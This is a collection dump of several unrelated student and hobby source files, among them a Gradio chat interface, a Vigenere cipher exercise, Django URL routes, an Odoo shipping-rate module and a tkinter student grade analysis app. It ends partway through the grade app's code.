search_user_info = gr.Button(\"Search\")\n\n system_msg = gr.Textbox(\n \"User Info\",\n label=\"System Message\",\n interactive=False,\n visible=True\n )\n\n\n with gr.Row():\n with gr.Column(): \n msg = gr.Textbox(\n label=\"Chat Message Box\",\n placeholder=\"Chat Message Box\",\n show_label=False\n ).style(container=False)\n \n with gr.Column():\n with gr.Row():\n submit = gr.Button(\"Submit\")\n stop = gr.Button(\"Stop\")\n clear = gr.Button(\"Clear\")\n\n chatbot = gr.Chatbot().style(height=350)\n\n\n search_user_info_event = search_user_info.click(fn=user_context, inputs=[user_id_holder],outputs=[system_msg], queue=False)\n\n\n submit_event = msg.submit(\n fn=user, inputs=[msg, chatbot], outputs=[msg, chatbot], queue=False\n ).then(\n fn=chat, inputs=[system_msg, chatbot], outputs=[chatbot], queue=True\n )\n\n submit_click_event = submit.click(\n fn=user, inputs=[msg, chatbot], outputs=[msg, chatbot], queue=False\n ).then(\n fn=chat, inputs=[system_msg, chatbot], outputs=[chatbot], queue=True\n )\n \n stop.click(\n fn=None, inputs=None, outputs=None, cancels=[submit_event, submit_click_event], queue=False\n )\n \n clear.click(lambda: None, None, [chatbot], queue=False)\n\ndemo.queue(max_size=32, concurrency_count=6)\ndemo.launch(server_name=\"0.0.0.0\")\n","repo_name":"jr4c/transformer-chat-ui","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":5388,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"4913371902","text":"# collect data\nfrom lightexperiments.light import Light\nlight = Light(dict(read_only=True))\nlight.launch()\ndata = light.experiments.filter(\n lambda obj:(\"lambda\" in obj and\n \"tags\" in obj and\n \"sanity_check_big_lambda\" in obj[\"tags\"])\n)\n#for i in range(len(data)):\n# light.experiments.delete(data[i][\"__id\"])\nlight.close()\ndata = sorted(data, key=lambda d:d[\"lambda\"])\nprint(len(data))\ndata = data[0::2]\n\n\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport seaborn as sns\nimport numpy as np\nfor i, d in enumerate(data):\n# print(d[\"lambda\"])\n# print(d[\"loss_ensemble_machine\"])\n loss_ensemble_machine = (np.array(d[\"loss_ensemble_machine\"]))\n loss_accuracy = np.array(d[\"loss_accuracy\"])\n accuracy = np.array(d[\"accuracy\"])\n loss = np.array(d[\"loss\"])\n\n #loss_ensemble_machine = ((loss_ensemble_machine - loss_ensemble_machine.min())/\n # (loss_ensemble_machine.max() - loss_ensemble_machine.min()))\n #loss_accuracy = ((loss_accuracy - loss_accuracy.min())/\n # (loss_accuracy.max() - loss_accuracy.min()))\n #accuracy = ((accuracy - accuracy.min())/\n # (accuracy.max() - accuracy.min()))\n\n\n plt.subplot(len(data), 2, i*2 + 1)\n plt.plot(loss_ensemble_machine, label=\"MDS loss\", c='blue')\n plt.legend()\n plt.subplot(len(data), 2, i*2 + 2)\n plt.plot(accuracy, label=\"accuracy\", c='red')\n plt.legend()\n #plt.plot(loss, label=\"loss\")\n #plt.plot(accuracy)\n# plt.plot(d[\"loss_accuracy\"])\n# plt.plot(d[\"accuracy\"])\n plt.title(\"lambda=%F\" % (d[\"lambda\"]))\n plt.legend()\n#plt.tight_layout(pad=0.1, w_pad=0.1, h_pad=0.5)\n#plt.figlegend( lines, labels, loc = 'lower center', ncol=5, labelspacing=0. )\nplt.show()\n","repo_name":"mehdidc/ensemble_machine","sub_path":"ramp/ramp_plot.py","file_name":"ramp_plot.py","file_ext":"py","file_size_in_byte":1769,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"72287489067","text":"#########################################################\n#Name: Thalla Divya\n#Class: CMPS 5363 Cryptography\n#Date: 29th July 2015\n#Program 2 - Randomized Vigenere Cipher\n#########################################################\nimport random\nimport sys\n\n#Generates a random matrix\ndef buildVigenere(seed):\n random.seed(seed)\n symbols = \"\"\" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\] ^_`abcdefghijklmnopqrstuvwxyz{|}~\"\"\"\n n = len(symbols)\n vigenere = [[0 for i in range(n)] for i in range(n)]\n symbols = list(symbols)\n random.shuffle(symbols)\n symbols = ''.join(symbols)\n \n for sym in symbols:\n random.seed(seed)\n myList = []\n \n for i in range(n):\n r = random.randrange(n)\n \n if r not in myList:\n myList.append(r)\n else:\n while(r in myList):\n r = random.randrange(n)\n \n myList.append(r)\n \n while(vigenere[i][r] != 0):\n r = (r + 1) % n\n \n vigenere[i][r] = sym\n \n return vigenere\n\t#function to create and print randomized vigenere matrix\ndef printMatrix():\n i=0\n j=0\n k=0\n line = \"\"\n\n for i in range(len(symbols)*len(symbols)):\n line = line + vigenere[j][k]\n j = j + 1\n if j >= 26:\n print(line)\n line = \"\"\n j = 0\n k = k + 1\t\n\t\t\t\n#############################################################\n\n#Encryptes the message with the key and seed value\ndef encrypt(message,seed):\n\tkey=keywordFromseed(seed)\n\tvigenere=buildVigenere(seed)\n\tcipherText = \"\"\n\ti=0\n\tfor i in range(len(message)):\n\t\tmi = i\n\t\tki = i % len(key)\n\t\tcol = ord(message[mi]) - 32\n\t\trow = ord(key[ki]) - 32\n\t\tcipherText = cipherText + vigenere[row][col]\n\treturn cipherText\n\n\t\n#Decryptes the message with the key and seed value\ndef d_decrypt(cipherText,seed):\n\tDecText = \"\"\n\tkey=keywordFromseed(seed)\n\tvigenere=buildVigenere(seed)\n\ti=0\n\tfor i in range(len(cipherText)):\n\t\temi = i\n\t\tki = i % len(key)\n\t\tif ord(cipherText[i]) == 32:\n\t\t\tDecText = DecText + ' '\n\t\telse:\n\t\t\tDecText = DecText + decrypt(cipherText,key,ki,emi,vigenere)\n\treturn DecText\n\t#-------------------------------------------------------------------- \ndef decrypt(cipherText,key,ki,emi,vigenere):\n\t#key=keywordFromseed(seed)\n\trow = ord(key[ki])-32\n\tmessage = cipherText[emi]\n\t#symbols = \"\"\" !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\] ^_`abcdefghijklmnopqrstuvwxyz{|}~\"\"\"\n\ti = 0\n\t#n=len(symbols)\n\tfor i in range(95):\n\t\tif cipherText[emi]==vigenere[row][i]:\n\t\t\tdecryptchar=chr(i+32)\n\t\t\treturn(decryptchar)\n\t\t\ti += 1\n\t#keyword is generated from seed \ndef keywordFromseed(seed):\n Letters = []\n \n while seed > 0:\n Letters.insert(0,chr((seed % 100) % 26 + 65))\n seed = seed // 100\n return ''.join(Letters)\n \n\t","repo_name":"divyathalla/CMPS-Cryptography-Divya","sub_path":"divya.thalla.vigenere/randomized_vigenere.py","file_name":"randomized_vigenere.py","file_ext":"py","file_size_in_byte":2938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70708601974","text":"from django.conf.urls import url, include\nfrom .views import all_issues, add_issue, edit_issue, upvote\n\nurlpatterns = [\n url(r'^$', all_issues, name = 'issues'),\n url(r'^addissue/$', add_issue, name = 'addissue'),\n url(r'^(?P\\d+)/editissue/$', edit_issue, name = 'editissue'),\n url(r'^(?P\\d+)/upvote/$', upvote, name='upvote'),\n ]\n\n\n\n\n","repo_name":"jonw83/issue-tracker-jw","sub_path":"issues/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"86745536687","text":"import sys\ninput = sys.stdin.readline\n# N은 로프의 개수, K에는 각 로프가 감당할 수 있는 최대의 무게가 저장된다.\nN = int(input())\nK = [int(input()) for _ in range(N)]\nK.sort()\n#print(K)\n# 로프가 많을수록 각 로프가 감당할 무게가 줄어들기 때문에 유리함.\n# 하지만 어떤 로프는 감당할 수 있는 무게가 너무 낮아서 빼는게 유리할 수도 있음.\n# 그렇다면 가장 가벼운 로프가 감당할 수 있는 무게 * 로프의 개수가 최선의 결과인가?\n# 그렇지 않다면 가장 가벼운 로프는 제외하고 그 다음 가벼운 로프가 감당할 수 있는 무게 * N-1\nM = K[0] * N # 현재 최대로 감당할 수 있는 무게를 M으로 설정\nn = N # 현재 적용되는 로프의 개수\nfor i in range(1, N):\n if M <= K[i]*(n-1):\n #print(M, K[i]*(n-1))\n M = K[i]*(n-1)\n n -= 1\n else:\n #print(M, K[i]*(n-1))\n n -= 1\nprint(M)","repo_name":"STkangyh/VacationAlgorithmClass","sub_path":"Baekjun/Silver/2217.py","file_name":"2217.py","file_ext":"py","file_size_in_byte":961,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"29502473266","text":"from functools import reduce\n_sum = reduce((lambda x, y: x + y), [1, 2, 3, 4]) # 10\nprint(_sum)\n# конечно, гораздо лучше воспользоваться sum:\n_sum = sum([1, 2, 3, 4]) # 10\nprint(_sum)\n\n\nalist = [(2, 2, 3), (1, 1), (1, 3, 3, 4)]\nalist = sorted(alist, key=lambda x: x[0])\n# сортируем по первому элементу в tuple\nprint(alist) # [(1, 1), (1, 3, 3, 4), (2, 2, 3)]\n","repo_name":"Pro1ooEgor/exercise","sub_path":"NEW/reduce_lambda_in_sorted_key.py","file_name":"reduce_lambda_in_sorted_key.py","file_ext":"py","file_size_in_byte":423,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73246928374","text":"from openerp import models, fields, api, _\nfrom openerp import netsvc\n\n\nclass shipping_rate_card(models.Model):\n _name = 'shipping.rate.card'\n _description = \"Ground Shipping Calculation Table\"\n name = fields.Char(string='Name', size=128, required=True)\n from_date = fields.Datetime(string='From Date')\n to_date = fields.Datetime(string='To Date')\n rate_ids = fields.One2many('shipping.rate', 'card_id', string='Shipping Rates', required=True)\n\n\nclass shipping_rate_config(models.Model):\n _name = 'shipping.rate.config'\n _description = \"Configuration for shipping rate\"\n _rec_name = 'shipmethodname'\n real_id = fields.Integer(string='ID', readonly=True)\n shipmethodname = fields.Char(string='Name', size=128, help='Shipping method name. Displayed in the wizard.')\n active = fields.Boolean(string='Active', help='Indicates whether a shipping method is active')\n use = fields.Boolean(string='Select')\n calc_method = fields.Selection([('country_weight', 'Country & Weight'),\n ('state_zone_weight', 'State-Zone-Weight'),\n ('manual', 'Manually Calculate')],\n string='Shipping Calculation Method',\n default='country_weight',\n help='Shipping method name. Displayed in the wizard.')\n shipping_wizard = fields.Integer(string='Shipping Wizard')\n zone_map_ids = fields.One2many('zone.map', 'rate_config_id', string='Zone Map')\n account_id = fields.Many2one('account.account', string='Account', help='This account represents the g/l account for booking shipping income.')\n shipment_tax_ids = fields.Many2many('account.tax', 'shipment_tax_rel', 'shipment_id', 'tax_id', string='Taxes', domain=[('parent_id', '=', False)])\n rate_card_id = fields.Many2one('shipping.rate.card', string='Shipping Rate Card')\n\n\nclass zone_map(models.Model):\n _name = 'zone.map'\n _description = \"Zone Mapping Table\"\n _rec_name = 'zone'\n zone = fields.Integer(string='Zone')\n state_id = fields.Many2one('res.country.state', string='State / Zone')\n rate_config_id = fields.Many2one('shipping.rate.config', string='Shipping Rate Configuration')\n\n\nclass shipping_rate(models.Model):\n _name = 'shipping.rate'\n _description = \"Shipping Calculation Table\"\n name = fields.Char(string='Name', size=128)\n from_weight = fields.Integer(string='From Weight', required=True)\n to_weight = fields.Integer(string='To Weight')\n charge = fields.Float(string='Shipping Charge')\n over_cost = fields.Float(string='Shipping Charge per pound over')\n country_id = fields.Many2one('res.country', string='Country')\n zone = fields.Integer(string='Zone', required=True)\n card_id = fields.Many2one('shipping.rate.card', string='Shipping Table')\n\n def find_cost(self, config_id, address, model_obj):\n \"\"\"\n Function to calculate shipping cost\n \"\"\"\n cost = 0\n table_env = self.env['shipping.rate']\n config_env = self.env['shipping.rate.config']\n # logger = netsvc.Logger()\n config_obj = config_env.browse(config_id)\n rate_card_id = config_obj.rate_card_id.id\n\n if config_obj.calc_method == 'country_weight':\n country_id = address.country_id.id\n weight_net = model_obj.total_weight_net\n table_ids = table_env.search([('card_id', '=', rate_card_id), ('country_id', '=', country_id),\n ('from_weight', '<=', weight_net), ('to_weight', '>', weight_net)])\n if table_ids:\n table_obj = table_env.browse(table_ids)[0]\n if table_obj.charge == 0.0 and table_obj.over_cost:\n cost = model_obj.total_weight_net * table_obj.over_cost\n else:\n cost = table_obj.charge\n else:\n search_list = [('card_id', '=', rate_card_id), ('country_id', '=', country_id), ('over_cost', '>', 0)]\n table_ids = table_env.search(search_list)\n if table_ids:\n table_objs = table_env.browse(table_ids)\n table_obj = table_objs[0]\n for table in table_objs:\n if table_obj.from_weight < table.from_weight:\n table_obj = table\n weight = model_obj.total_weight_net\n if table_obj.charge > 0:\n cost = table_obj.charge\n weight -= table_obj.from_weight\n if weight > 0:\n cost += weight * table_obj.over_cost\n else:\n cost = weight * table_obj.over_cost\n# else:\n# logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find rate table with Shipping Table = %s and \\\n# Country = %s and Over Cost > 0.\"%(config_obj.rate_card_id.name, address.country_id.name)))\n\n elif config_obj.calc_method == 'state_zone_weight':\n zone_env = self.env['zone.map']\n state_id = address.state_id.id\n zone_ids = zone_env.search([('rate_config_id', '=', config_obj.id), ('state_id', '=', state_id)])\n if zone_ids:\n zone = zone_env.read(['zone'])[0]\n table_ids = table_env.search([('card_id', '=', rate_card_id), ('zone', '=', zone)])\n if table_ids:\n table_obj = table_env.browse(table_ids)[0]\n weight = model_obj.total_weight_net\n if table_obj.charge > 0:\n cost = table_obj.charge\n weight -= table_obj.to_weight\n if weight > 0:\n cost += weight * table_obj.over_cost\n else:\n cost = weight * table_obj.over_cost\n# else:\n# logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find rate table with Shipping Table = %s and \\\n# Zone = %s.\"%(config_obj.shipmethodname, zone)))\n# else:\n# logger.notifyChannel(_(\"Calculate Shipping\"), netsvc.LOG_WARNING, _(\"Unable to find Zone Mapping Table with Shipping Rate \\\n# Configuration = %s and State = %s.\"%(config_obj.shipmethodname, address.state_id.name)))\n elif config_obj.calc_method == 'manual':\n cost = 0.0\n return cost\n\n\n# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:\n","repo_name":"JayVora-SerpentCS/OdooUSA","sub_path":"sale_negotiated_shipping/sale_negotiated_shipping.py","file_name":"sale_negotiated_shipping.py","file_ext":"py","file_size_in_byte":6727,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"21"} +{"seq_id":"8995126456","text":"# 序言注释\n# 本系统使用GUI变成编写友好的可视化界面\n# 增加直接呈现全班成绩的功能\n# 增加登录功能,使数据更加安全\n# 增加对学生成绩修改的操作(增加、删除)\n\nimport csv\nimport tkinter\nimport os\nfrom tkinter.messagebox import showinfo\nfrom tkinter.ttk import *\nfrom tkinter import messagebox\nfrom tkinter import StringVar\n# from matplotlib import pyplot as plt\n\n\nclass Login(object):\n def __init__(self):\n # 创建主窗口,用于容纳其它组件\n self.root = tkinter.Tk()\n # 给主窗口设置标题内容\n self.root.title(\"学生成绩分析系统\")\n self.root.geometry('750x550')\n # 运行代码时记得添加一个gif图片文件,不然是会出错的\n self.canvas = tkinter.Canvas(self.root, height=535, width=734, bd=10) # 创建画布\n self.image_file = tkinter.PhotoImage(file='tu1.gif') # 加载图片文件\n self.image = self.canvas.create_image(0, 0, anchor='nw', image=self.image_file) # 将图片置于画布上\n self.canvas.pack(side='top') # 放置画布(上端)\n\n # 创建一个`label`名为`账号: `\n self.label_account = tkinter.Label(self.root, text='账号: ')\n # 创建一个`label`名为`密码: `\n self.label_password = tkinter.Label(self.root, text='密码: ')\n\n # 创建一个账号输入框,并设置尺寸\n self.input_account = tkinter.Entry(self.root, width=15)\n # 创建一个密码输入框,并设置尺寸\n self.input_password = tkinter.Entry(self.root, show='*', width=15)\n\n # 创建一个登录系统的按钮\n self.login_button = tkinter.Button(self.root, command=self.login_sys, text=\"登录\", width=10)\n\n # 完成布局\n\n def gui_arrang(self):\n self.label_account.place(x=60, y=480)\n self.label_password.place(x=290, y=480)\n self.input_account.place(x=135, y=480)\n self.input_password.place(x=350, y=480)\n self.login_button.place(x=550, y=480)\n\n # 进行登录信息验证\n def login_sys(self):\n account = self.input_account.get().ljust(9, \" \")\n password = self.input_password.get().ljust(6, \" \")\n if account == '190350120' and password == '123456':\n messagebox.showinfo('系统提示', '登录成功!')\n self.root.destroy()\n MainWindow()\n else:\n messagebox.showinfo('系统提示', '登录失败')\n\n\n# 主要窗口\n\nclass MainWindow(object):\n def __init__(self):\n self.root = tkinter.Tk()\n self.root.title(\"学生成绩分析系统\")\n self.root.geometry('800x550')\n self.setup_UI()\n self.load_file_student_info()\n self.load_treeview(self.all_student_list)\n\n def setup_UI(self):\n # 设定Style\n self.Style01 = Style()\n self.Style01.configure(\"left.TPanedwindow\", background=\"deepskyblue\")\n self.Style01.configure(\"right.TPanedwindow\", background=\"deepskyblue\")\n self.Style01.configure(\"TButton\", width=10, font=(\"华文黑体\", 13, \"bold\"))\n\n # 左边:按钮区域,创建一个容器\n self.Pane_left = PanedWindow(width=160, height=540, style=\"left.TPanedwindow\")\n self.Pane_left.place(x=4, y=10)\n self.Pane_right = PanedWindow(width=700, height=540, style=\"right.TPanedwindow\")\n self.Pane_right.place(x=210, y=10)\n\n # 添加左边按钮\n self.Button_add = Button(self.Pane_left, text=\"添加学生\", style=\"TButton\",command = Add)\n self.Button_add.place(x=20, y=20)\n self.Button_delete = Button(self.Pane_left, text=\"删除学生\", style=\"TButton\",command = Delete)\n self.Button_delete.place(x=20, y=50)\n self.Button_max = Button(self.Pane_left, text=\"最高分\", style=\"TButton\",command = self.sort_1)\n self.Button_max.place(x=20, y=80)\n self.Button_min = Button(self.Pane_left, text=\"最低分\", style=\"TButton\",command = self.sort_2)\n self.Button_min.place(x=20, y=110)\n self.Button_avg = Button(self.Pane_left, text=\"单科平均分\", style=\"TButton\",command = self.avg_sub)\n self.Button_avg.place(x=20, y=140)\n self.Button_ave = Button(self.Pane_left, text=\"单人平均分\", style=\"TButton\", command=self.ave_sub)\n self.Button_ave.place(x=20, y=170)\n self.Button_sum = Button(self.Pane_left, text=\"总分\", style=\"TButton\",command = self.sum)\n self.Button_sum.place(x=20, y=200)\n self.Button_pic = Button(self.Pane_left, text=\"分析图\", style=\"TButton\",command = view_win)\n self.Button_pic.place(x=20, y=230)\n\n # 右侧查询界面\n self.Pane_right = PanedWindow(width=720, height=540, style=\"right.TPanedwindow\")\n self.Pane_right.place(x=170, y=10)\n # LabelFrame\n self.LabelFrame_query = LabelFrame(self.Pane_right, text=\"学生信息显示\", width=620, height=60)\n self.LabelFrame_query.place(x=10, y=10)\n # 添加控件\n self.Label_sno = Label(self.LabelFrame_query, text=\"欢迎登录学生成绩分析系统\")\n self.Label_sno.place(x=5, y=13)\n\n # self.var_sno = StringVar()\n # self.Entry_sno = Entry(self.LabelFrame_query, width=8, textvariable=self.var_sno)\n # self.Entry_sno.place(x=40, y=10)\n\n # self.Button_query = Button(self.LabelFrame_query, text=\"查询\", width=4)\n # self.Button_query.place(x=450, y=10)\n # self.Button_all = Button(self.LabelFrame_query, text=\"显示全部\", width=8)\n # self.Button_all.place(x=510, y=10)\n\n self.Tree = Treeview(self.Pane_right, columns=(\"sno\", \"math\", \"english\", \"python\"),\n show=\"headings\", height=20)\n\n # 设置每一个列的宽度和对齐的方式\n self.Tree.column(\"sno\", width=150, anchor=\"center\")\n self.Tree.column(\"math\", width=150, anchor=\"center\")\n self.Tree.column(\"english\", width=150, anchor=\"center\")\n self.Tree.column(\"python\", width=150, anchor=\"center\")\n\n # 设置每个列的标题\n self.Tree.heading(\"sno\", text=\"学号\")\n self.Tree.heading(\"math\", text=\"高数\")\n self.Tree.heading(\"english\", text=\"英语\")\n self.Tree.heading(\"python\", text=\"python\")\n self.Tree.place(x=10, y=80)\n\n self.all_student_list = []\n self.file_path = \"student_score - 副本.csv\"\n # 读取文件\n\n def load_file_student_info(self):\n if not os.path.exists(self.file_path):\n showinfo(\"系统消息\", \"提供的文件名不存在!\")\n else:\n try:\n with open(file=self.file_path, mode=\"r\") as fd:\n # 一次读一行\n current_line = fd.readline()\n while current_line:\n temp_list = current_line.split(\",\") # 长字符串分割层三个\n self.all_student_list.append(temp_list)\n # 读取下一行,读完了循环就结束了\n current_line = fd.readline()\n except:\n showinfo(\"系统消息\", \"文件读取出现异常!\")\n\n # 本应该界面内进行的搜索功能,功能无法实现废案\n # # 搜索功能\n # self.query_result_list = []\n #\n # def get_query_result(self):\n # # 准备查询条件:获取学号\n # query_condition = self.Entry_sno.get()\n # # 遍历List获取符合条件的学生信息\n # for item in self.all_student_list:\n # if query_condition in item[0]:\n # # 满足条件的学生\n # self.query_result_list.append(item)\n # # 把结果加载的TreeView中\n # self.load_treeview(self.query_result_list)\n\n # def load_all_student(self):\n # # 加载所有的学生信息到treeview\n # self.load_treeview(self.all_student_list)\n\n # 加载数据,输入到二维列表中\n def load_treeview(self, current_list: list):\n # 判断是否有数据:\n if len(current_list) == 0:\n showinfo(\"系统消息\", \"没有数据加载\")\n else:\n for index in range(len(current_list)):\n self.Tree.insert(\"\", index, values=(current_list[index][0], current_list[index][1],\n current_list[index][2], current_list[index][3],\n ))\n self.Tree = Treeview(self.Pane_right, columns=(\"sno\", \"math\", \"english\", \"python\"),\n show=\"headings\", height=40)\n\n\n # 排序,输出最高分\n def sort_1(self):\n win_sort = tkinter.Tk()\n win_sort.geometry('300x110')\n win_sort.title(\"最高分\")\n # 排序\n score_01.sort()\n score_02.sort()\n score_03.sort()\n # 输出最高分\n label_math = Label(win_sort, text=\"高数最高分为{}\".format(score_01[len(score_01) - 1]))\n label_math.pack()\n label_english = Label(win_sort, text=\"英语最高分为{}\".format(score_02[len(score_02) - 1]))\n label_english.pack()\n label_py = Label(win_sort, text=\"python最高分为{}\".format(score_03[len(score_03) - 1]))\n label_py.pack()\n win_sort.mainloop()\n\n\n # 排序,输出最低分\n def sort_2(self):\n win_sort = tkinter.Tk()\n win_sort.geometry('300x110')\n win_sort.title(\"最低分\")\n # 排序\n score_01.sort()\n score_02.sort()\n score_03.sort()\n # 输出最高分\n label_math = Label(win_sort, text=\"高数最低分为{}\".format(score_01[0]))\n label_math.pack()\n label_english = Label(win_sort, text=\"英语最低分为{}\".format(score_02[0]))\n label_english.pack()\n label_py = Label(win_sort, text=\"python最低分为{}\".format(score_03[0]))\n label_py.pack()\n win_sort.mainloop()\n\n\n # 平均分\n # 每科目平均分\n def avg_sub(self):\n win_ave_subject = tkinter.Tk()\n win_ave_subject.geometry('300x110')\n win_ave_subject.title(\"平均分\")\n num_ave_subject1 = 0\n num_ave_subject2 = 0\n num_ave_subject3 = 0\n for i in range(len(score)):\n num_ave_subject1 = num_ave_subject1 + eval(score[i][1])\n for i in range(len(score)):\n num_ave_subject2 = num_ave_subject2 + eval(score[i][2])\n for i in range(len(score)):\n num_ave_subject3 = num_ave_subject3 + eval(score[i][3])\n label1 = Label(win_ave_subject, text=\"高数的平均分为{:.2f}\".format(num_ave_subject1 / len(score)))\n label1.pack()\n label2 = Label(win_ave_subject, text=\"英语的平均分为{:.2f}\".format(num_ave_subject2 / len(score)))\n label2.pack()\n label3 = Label(win_ave_subject, text=\"python的平均分为{:.2f}\".format(num_ave_subject3 / len(score)))\n label3.pack()\n win_ave_subject.mainloop()\n\n # 单人平均分\n def ave_sub(self):\n win_ave_student = tkinter.Tk()\n win_ave_student.geometry('250x800')\n win_ave_student.title(\"平均分\")\n for i in range(len(score)):\n num_01 = \"%.2f\" % ((eval(score[i][1]) + eval(score[i][2]) + eval(score[i][3])) / 3)\n label = Label(win_ave_student, text=\"学号为{}的同学,平均分为:\".format(score[i][0]) + num_01)\n label.pack()\n win_ave_student.mainloop()\n\n\n # 总分计算\n def sum(self):\n win_generalPoints = tkinter.Tk()\n win_generalPoints.geometry('200x600')\n win_generalPoints.title(\"总分\")\n for i_points in range(len(score)):\n num_01 = \"%.2f\" % (eval(score[i_points][1]) + eval(score[i_points][2]) + eval(score[i_points][3]))\n label = Label(win_generalPoints, text=\"{}的总分为:\".format(score[i_points][0]) + num_01)\n label.pack()\n win_generalPoints.mainloop()\n\n\n# 成绩的可视化\ndef view(x_view):\n num_view1 = 0 # 优秀\n num_view2 = 0 # 良好\n num_view3 = 0 # 中等\n num_view4 = 0 # 不合格\n\n for i_view in range(len(x_view)):\n if 95 <= x_view[i_view] <= 100:\n num_view1 = num_view1 + 1\n continue\n if 80 <= x_view[i_view] <= 94:\n num_view2 = num_view2 + 1\n continue\n if 60 <= x_view[i_view] <= 79:\n num_view3 = num_view3 + 1\n continue\n if x_view[i_view] < 60:\n num_view4 = num_view4 + 1\n continue\n\n num_view1 = float(\"%.2f\" % (num_view1 / len(x_view) * 100))\n num_view2 = float(\"%.2f\" % (num_view2 / len(x_view) * 100))\n num_view3 = float(\"%.2f\" % (num_view3 / len(x_view) * 100))\n num_view4 = float(\"%.2f\" % (100 - num_view1 - num_view2 - num_view3))\n\n labels = 'excellent', 'good', 'pass', 'fail'\n sizes = [num_view1, num_view2, num_view3, num_view4]\n fig1, (ax1) = plt.subplots(1)\n ax1.pie(sizes, labels=labels, autopct='%1.1f%%')\n ax1.axis('equal')\n plt.show()\n\ndef view_02(x_view):\n num_view1 = 0 # 优秀\n num_view2 = 0 # 良好\n num_view3 = 0 # 中等\n num_view4 = 0 # 不合格\n\n for i_view in range(len(x_view)):\n if 261 <= x_view[i_view] <= 300:\n num_view1 = num_view1 + 1\n continue\n if 241 <= x_view[i_view] <= 260:\n num_view2 = num_view2 + 1\n continue\n if 221 <= x_view[i_view] <= 240:\n num_view3 = num_view3 + 1\n continue\n if x_view[i_view] < 200:\n num_view4 = num_view4 + 1\n continue\n\n num_view1 = float(\"%.2f\" % (num_view1 / len(x_view) * 100))\n num_view2 = float(\"%.2f\" % (num_view2 / len(x_view) * 100))\n num_view3 = float(\"%.2f\" % (num_view3 / len(x_view) * 100))\n num_view4 = float(\"%.2f\" % (100 - num_view1 - num_view2 - num_view3))\n\n # labels = '优秀', '良好', '中等', '不合格'\n labels = 'A', 'B', 'C', 'D'\n sizes = [num_view1, num_view2, num_view3, num_view4]\n fig1, (ax1) = plt.subplots(1)\n ax1.pie(sizes, labels=labels, autopct='%1.1f%%', shadow=True)\n ax1.axis('equal')\n plt.show()\n\n# 高数的视图\ndef view1():\n view(score_01)\n\n# 英语的视图\ndef view2():\n view(score_02)\n\n# python视图\ndef view3():\n view(score_03)\n\n#总分的视图\ndef view4():\n view_02(score)\n\n# 可视化界面\ndef view_win():\n # 创建一个页面\n win_view = tkinter.Tk()\n win_view.title(\"分析图\")\n win_view.geometry('200x150')\n button1_view = Button(win_view, text=\"高数\",command=view1)\n button2_view = Button(win_view, text=\"英语\",command=view2)\n button3_view = Button(win_view, text=\"python\", command=view3)\n button4_view = Button(win_view, text=\"总分\", command=view4)\n\n button1_view.pack()\n button2_view.pack()\n button3_view.pack()\n button4_view.pack()\n win_view.mainloop()\n\n# # 添加其他学生成绩的功能\ndef Add():\n window = tkinter.Tk()\n window.title(\"增加学生\")\n frame = Frame(window)\n frame.pack(padx=8, pady=8, ipadx=4)\n\n lab1 = Label(frame, text=\"学号\")\n lab1.grid(row=0, column=0, padx=5, pady=5)\n\n lab2 = Label(frame, text=\"高数\")\n lab2.grid(row=1, column=0, padx=5, pady=5)\n\n lab3 = Label(frame, text=\"英语\")\n lab3.grid(row=2, column=0, padx=5, pady=5)\n\n lab4 = Label(frame, text=\"python\")\n lab4.grid(row=3, column=0, padx=5, pady=5)\n\n lab5 = Label(frame, text=\"结果\")\n lab5.grid(row=4, column=0, padx=5, pady=5)\n\n # 绑定对象到Entry\n\n p1 = StringVar(master=window)\n ent1 = Entry(frame, textvariable=p1)\n ent1.grid(row=0, column=1)\n\n p2 = StringVar(master=window)\n ent2 = Entry(frame, textvariable=p2)\n ent2.grid(row=1, column=1)\n\n p3 = StringVar(master=window)\n ent3 = Entry(frame, textvariable=p3)\n ent3.grid(row=2, column=1)\n\n p4 = StringVar(master=window)\n ent4 = Entry(frame, textvariable=p4)\n ent4.grid(row=3, column=1)\n\n p5 = StringVar(master=window)\n ent5 = Entry(frame, textvariable=p5)\n ent5.grid(row=4, column=1, sticky='ew', columnspan=2)\n\n def submit():\n num = 0 # 一个计数的变量,记录你是否学号相同\n for i in range(len(score)):\n if eval(p1.get()) == eval(score[i][0]):\n num = 1\n p5.set(\"添加失败\")\n if num == 0:\n student = [p1.get(), p2.get(), p3.get(), p4.get()]\n score.append(student)\n close_csv()\n p5.set(\"添加成功\")\n\n button = Button(frame, text=\"提交\", command=submit)\n button.grid(row=5, column=1)\n window.mainloop()\n\n# 删除学生成绩\ndef Delete():\n window2 = tkinter.Tk()\n window2.title(\"删除成绩\")\n window2.geometry('300x120')\n frame = Frame(window2)\n frame.pack(padx=8, pady=8, ipadx=4)\n lab1 = Label(frame, text=\"学号\")\n lab1.grid(row=0, column=0, padx=5, pady=5)\n lab2 = Label(frame, text=\"结果\")\n lab2.grid(row=1, column=0, padx=5, pady=5)\n # 绑定对象到Entry\n\n p1 = StringVar(master=window2)\n ent1 = Entry(frame, textvariable=p1)\n ent1.grid(row=0, column=1)\n\n p2 = StringVar(master=window2)\n ent2 = Entry(frame, textvariable=p2)\n ent2.grid(row=1, column=1)\n\n def submit():\n num = 0\n for a in range(len(score)):\n if eval(score[a][0]) == eval(ent1.get()):\n del score[a]\n num = 1\n p2.set(\"删除成功\")\n close_csv()\n break\n if num == 0:\n p2.set(\"查无此学生\")\n\n button = Button(frame, 